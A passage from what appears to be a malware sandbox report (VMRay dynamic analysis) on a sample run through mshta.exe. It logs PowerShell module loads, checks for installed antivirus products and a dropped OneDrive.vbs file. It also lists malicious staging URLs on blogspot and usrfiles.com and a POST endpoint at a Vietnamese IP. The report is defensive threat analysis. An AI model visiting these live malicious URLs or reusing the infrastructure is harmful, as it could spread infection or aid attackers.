C:\Windows\System32\Wbem Accessed File Access CLEAN
C:\Windows\System32\WindowsPowerShell\v1.0\ Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft Office\root\Client Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft Office\Root\Office16\ Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.psd1 Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.psm1 Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.xaml Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.dll Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement
Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1
Accessed File Access, Read CLEAN
C:\Windows\SysWOW64\schtasks.exe Accessed File Access CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Dropped File Access, Create, Write, Read CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
Accessed File Access, Read CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll
Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 42 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1
Accessed File Access, Read CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
Accessed File Access CLEAN
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en-US\PowerShellGet.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en\PowerShellGet.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1
Accessed File Access, Read CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Resource.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGetModuleInfo.xml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll
Accessed File Access CLEAN
C:\Users\kEecfMwgj\Documents\WindowsPowerShell\Modules Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.psd1 Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.psm1 Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.cdxml Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.xaml Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.ni.dll Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.dll Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement
Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 43 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1
Accessed File Access, Read CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1
Accessed File Access, Read CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en-US\PowerShellGet.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en\PowerShellGet.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1
Accessed File Access, Read CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Resource.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGetModuleInfo.xml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.psd1
Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 44 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.psm1
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.cdxml
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.xaml
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1
Accessed File Access, Read CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1
Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 45 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
Reduced dataset
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1
Accessed File Access, Read CLEAN
C:\Program Files\ESET\ESET Security\ecmds.exe Accessed File Access CLEAN
C:\Program Files\Avast Software\Avast\AvastUI.exe Accessed File Access CLEAN
C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe Accessed File Access CLEAN
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe Accessed File Access CLEAN
C:\Program Files\AVG\Antivirus\AVGUI.exe Accessed File Access CLEAN
C:\Users\Public\OneDrive.vbs Dropped FileDelete, Write, Access,Create, Read
CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1
Accessed File Access, Read CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1
Accessed File Access, Read CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll
Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 46 / 60
DYNAMIC ANALYSIS REPORT#2111629
URL
URL Category IP Address Country HTTP Methods Verdict
http://1230948%[email protected]/p/9.html
- 216.58.212.161 - GET MALICIOUS
http://bukbukbukak.blogspot.com/p/9.html - 216.58.212.161 - GET MALICIOUS
https://bukbukbukak.blogspot.com/p/9.html - 216.58.212.161 - GET MALICIOUS
https://bukbukbukak.blogspot.com/js/cookienotice.js
- 216.58.212.161 - GET MALICIOUS
http://1230948%[email protected]/p/9.html/
- - - - SUSPICIOUS
https://www.bitly.com/ddwddwwkfwdwoooi - 67.199.248.14 - GET CLEAN
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt
- 34.102.176.152 - GET CLEAN
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt
- 34.102.176.152 - GET CLEAN
https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt
- 34.102.176.152 - GET CLEAN
https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_02df7f9ae2d74130872a6c4165f7ed60.txt
- - - - CLEAN
http://bitly.com/ddwddwwkfwdwoooi - 67.199.248.14 - GET CLEAN
http://pki.goog/gsr1/gsr1.crt - 216.239.32.29 - GET CLEAN
http://www.google.com - 172.217.23.100 - GET CLEAN
http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy
- 172.217.23.100 - GET CLEAN
http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php - 180.214.239.67 - POST CLEAN
https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html
- 216.58.212.161 - GET CLEAN
https://fckusecurityresearchermotherfkrs.blogspot.com/js/cookienotice.js
- 216.58.212.161 - GET CLEAN
https://www.blogger.com/static/v1/widgets/3822632116-css_bundle_v2.css
- - - GET CLEAN
https://www.blogger.com/static/v1/widgets/2583860411-widgets.js
- - - GET CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1
- 142.250.186.41 - GET CLEAN
https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
- - - GET CLEAN
https://www.blogger.com/dyn-css/authorization.css?targetBlogID=644545533916229546&zx=551455ad-7f93-402f-89a1-d9e43c6794f5
- - - GET CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&type=blog
- - - GET CLEAN
https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
- - - GET CLEAN
X-Ray Vision for Malware - www.vmray.com 47 / 60
DYNAMIC ANALYSIS REPORT#2111629
URL Category IP Address Country HTTP Methods Verdict
https://fonts.googleapis.com/css?family=Open+Sans:300
- 142.250.74.202 - GET CLEAN
https://fonts.googleapis.com/css?lang=de&family=Product+Sans|Roboto:400,700
- 142.250.74.202 - GET CLEAN
https://www.google-analytics.com/analytics.js - - - GET CLEAN
https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/... ...s://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true
- 142.250.185.237 - GET CLEAN
https://www.blogger.com/dyn-css/authorization.css?targetBlogID=3230375044160936909&zx=74bb4738-53be-4905-9fa3-25325b11a73a
- - - GET CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https://bukbukbukak.blogspot.com/p/9.html&type=blog
- - - GET CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbukbukbukak.blogspot.com%2Fp%2F9.html&type=blog&bpli=1
- - - GET CLEAN
http://www.google.com/policies/terms/ - - - GET CLEAN
http://support.google.com/websearch/answer/86640
- - - GET CLEAN
https://www.google.com/recaptcha/api.js - - - GET CLEAN
https://fckusecurityresearchermotherfkrs.blogspot.com/favicon.ico
- - - GET CLEAN
https://fckusecurityresearchermotherfkrs.blogspot.com
- - - GET CLEAN
https://www.blogger.com - - - GET CLEAN
https://www.google.de/intl/de/about/products?tab=jh
- - - GET CLEAN
https://myaccount.google.com/?utm_source=OGB&tab=jk&utm_medium=app
- - - GET CLEAN
https://www.google.de/webhp?tab=jw - - - GET CLEAN
https://maps.google.de/maps?hl=de&tab=jl - - - GET CLEAN
https://www.youtube.com/?gl=DE&tab=j1 - - - GET CLEAN
https://play.google.com/?hl=de&tab=j8 - - - GET CLEAN
https://news.google.com/?tab=jn - - - GET CLEAN
https://mail.google.com/mail/?tab=jm - - - GET CLEAN
https://meet.google.com/?hs=197 - - - GET CLEAN
https://chat.google.com - - - GET CLEAN
https://contacts.google.com/?hl=de&tab=jC - - - GET CLEAN
https://drive.google.com/?tab=jo - - - GET CLEAN
https://calendar.google.com/calendar?tab=jc - - - GET CLEAN
https://translate.google.de/?hl=de&tab=jT - - - GET CLEAN
https://photos.google.com/?tab=jq&pageId=none - - - GET CLEAN
https://duo.google.com/?usp=duo_ald - - - GET CLEAN
X-Ray Vision for Malware - www.vmray.com 48 / 60
DYNAMIC ANALYSIS REPORT#2111629
URL Category IP Address Country HTTP Methods Verdict
https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_campaign=desktop-app-launcher&utm_content=chrome-logo&utm_keyword=CHZO
- - - GET CLEAN
https://www.google.de/shopping?hl=de&source=og&tab=jf
- - - GET CLEAN
https://docs.google.com/document/?usp=docs_alc - - - GET CLEAN
https://docs.google.com/spreadsheets/?usp=sheets_alc
- - - GET CLEAN
https://docs.google.com/presentation/?usp=slides_alc
- - - GET CLEAN
https://books.google.de/?hl=de&tab=jp - - - GET CLEAN
https://www.blogger.com/?tab=jj - - - GET CLEAN
https://hangouts.google.com - - - GET CLEAN
https://keep.google.com - - - GET CLEAN
https://jamboard.google.com/?usp=jam_ald - - - GET CLEAN
https://earth.google.com/web/ - - - GET CLEAN
https://www.google.de/save - - - GET CLEAN
https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral
- - - GET CLEAN
https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1!o2
- - - GET CLEAN
https://podcasts.google.com - - - GET CLEAN
https://stadia.google.com - - - GET CLEAN
https://www.google.com/travel/?dest_src=al - - - GET CLEAN
https://docs.google.com/forms/?usp=forms_alc - - - GET CLEAN
https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&ec=GAZAHg
- - - GET CLEAN
https://www.blogger.com/age-verification.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&from=APq4FmCi5NBs1f3axOfaSfoosWI5gDvOWPuVdwMn7HZMV1Hu00EksHZcLZ8-Uz03byZEC6CvHoy-fLnoyhgJ3-myRV-oRFV6mg
- - - GET CLEAN
https://www.blogger.com/go/helpcenter - - - GET CLEAN
https://www.blogger.com/go/discuss - - - GET CLEAN
https://www.blogger.com/go/tutorials - - - GET CLEAN
https://www.blogger.com/go/buzz - - - GET CLEAN
https://www.blogger.com/go/devapi - - - GET CLEAN
https://www.blogger.com/go/devforum - - - GET CLEAN
https://www.blogger.com/go/terms - - - GET CLEAN
https://www.blogger.com/go/privacy - - - GET CLEAN
https://www.blogger.com/go/contentpolicy - - - GET CLEAN
X-Ray Vision for Malware - www.vmray.com 49 / 60
DYNAMIC ANALYSIS REPORT#2111629
URL Category IP Address Country HTTP Methods Verdict
Domain
Domain IP Address Country Protocols Verdict
https://www.google.de/contact/impressum.html - - - GET CLEAN
https://bukbukbukak.blogspot.com/favicon.ico - - - GET CLEAN
https://bukbukbukak.blogspot.com - - - GET CLEAN
bukbukbukak.blogspot.com 216.58.212.161 - HTTP, DNS, HTTPS MALICIOUS
www.bitly.com 67.199.248.15, 67.199.248.14 - HTTP, DNS, HTTPS CLEAN
92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com 34.102.176.152 - HTTP, DNS, HTTPS CLEAN
35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com 34.102.176.152 - HTTP, DNS, HTTPS CLEAN
bitly.com 67.199.248.15, 67.199.248.14 - HTTP, DNS CLEAN
fckusecurityresearchermotherfkrs.blogspot.com 216.58.212.161 - DNS, HTTPS CLEAN
blogspot.l.googleusercontent.com 216.58.212.161 - DNS CLEAN
pki.goog 216.239.32.29 - HTTP, DNS CLEAN
www.blogger.com 142.250.186.41 - HTTPS CLEAN
accounts.google.com 142.250.185.237 - HTTPS CLEAN
fonts.googleapis.com 142.250.74.202 - DNS, HTTPS CLEAN
www.google.com 172.217.23.100 - HTTP, DNS, HTTPS CLEAN
www.google-analytics.com - - HTTPS CLEAN
media-router.wixstatic.com 34.102.176.152 - DNS CLEAN
gcp.media-router.wixstatic.com 34.102.176.152 - DNS CLEAN
support.google.com - - HTTP CLEAN
www.google.de - - HTTPS CLEAN
myaccount.google.com - - HTTPS CLEAN
maps.google.de - - HTTPS CLEAN
www.youtube.com - - HTTPS CLEAN
play.google.com - - HTTPS CLEAN
news.google.com - - HTTPS CLEAN
mail.google.com - - HTTPS CLEAN
meet.google.com - - HTTPS CLEAN
chat.google.com - - HTTPS CLEAN
contacts.google.com - - HTTPS CLEAN
drive.google.com - - HTTPS CLEAN
calendar.google.com - - HTTPS CLEAN
translate.google.de - - HTTPS CLEAN
photos.google.com - - HTTPS CLEAN
duo.google.com - - HTTPS CLEAN
X-Ray Vision for Malware - www.vmray.com 50 / 60
DYNAMIC ANALYSIS REPORT#2111629
Domain IP Address Country Protocols Verdict
IP
IP Address Domains Country Protocols Verdict
Mutex
Name Operations Parent Process Name Verdict
Registry
Registry Key Operations Parent Process Name Verdict
docs.google.com - - HTTPS CLEAN
books.google.de - - HTTPS CLEAN
hangouts.google.com - - HTTPS CLEAN
keep.google.com - - HTTPS CLEAN
jamboard.google.com - - HTTPS CLEAN
earth.google.com - - HTTPS CLEAN
artsandculture.google.com - - HTTPS CLEAN
ads.google.com - - HTTPS CLEAN
podcasts.google.com - - HTTPS CLEAN
stadia.google.com - - HTTPS CLEAN
172.217.23.100 www.google.com United States HTTP, TCP, DNS, HTTPS MALICIOUS
34.102.176.152
gcp.media-router.wixstatic.com, media-router.wixstatic.com, 92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com,35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com
United States TCP, DNS, HTTPS MALICIOUS
180.214.239.67 - Vietnam TCP, HTTP MALICIOUS
192.168.0.1 - - UDP, DNS CLEAN
216.58.212.161blogspot.l.googleusercontent.com,bukbukbukak.blogspot.com,fckusecurityresearchermotherfkrs.blogspot.com
United States HTTP, TCP, DNS, HTTPS CLEAN
67.199.248.14 www.bitly.com, bitly.com United States HTTP, TCP, DNS, HTTPS CLEAN
142.250.186.41blogger.l.google.com, www.blogger.com,resources.blogblog.com
United States TCP, DNS, HTTPS CLEAN
216.239.32.29 pki.goog United States HTTP, TCP, DNS CLEAN
142.250.185.237 accounts.google.com United States TCP, DNS, HTTPS CLEAN
142.250.74.202 fonts.googleapis.com United States TCP, DNS, HTTPS CLEAN
172.217.23.110www.google-analytics.com, www-google-analytics.l.google.com
United States TCP, DNS, HTTPS CLEAN
67.199.248.15 www.bitly.com, bitly.com United States DNS CLEAN
Local\!PrivacIE!SharedMemory!Mutex access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\cookerr access, write mshta.exe SUSPICIOUS
HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32
access, read mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\InternetExplorer\Main\FeatureControl
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Main\FeatureControl
access mshta.exe CLEAN
X-Ray Vision for Malware - www.vmray.com 51 / 60
DYNAMIC ANALYSIS REPORT#2111629
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR
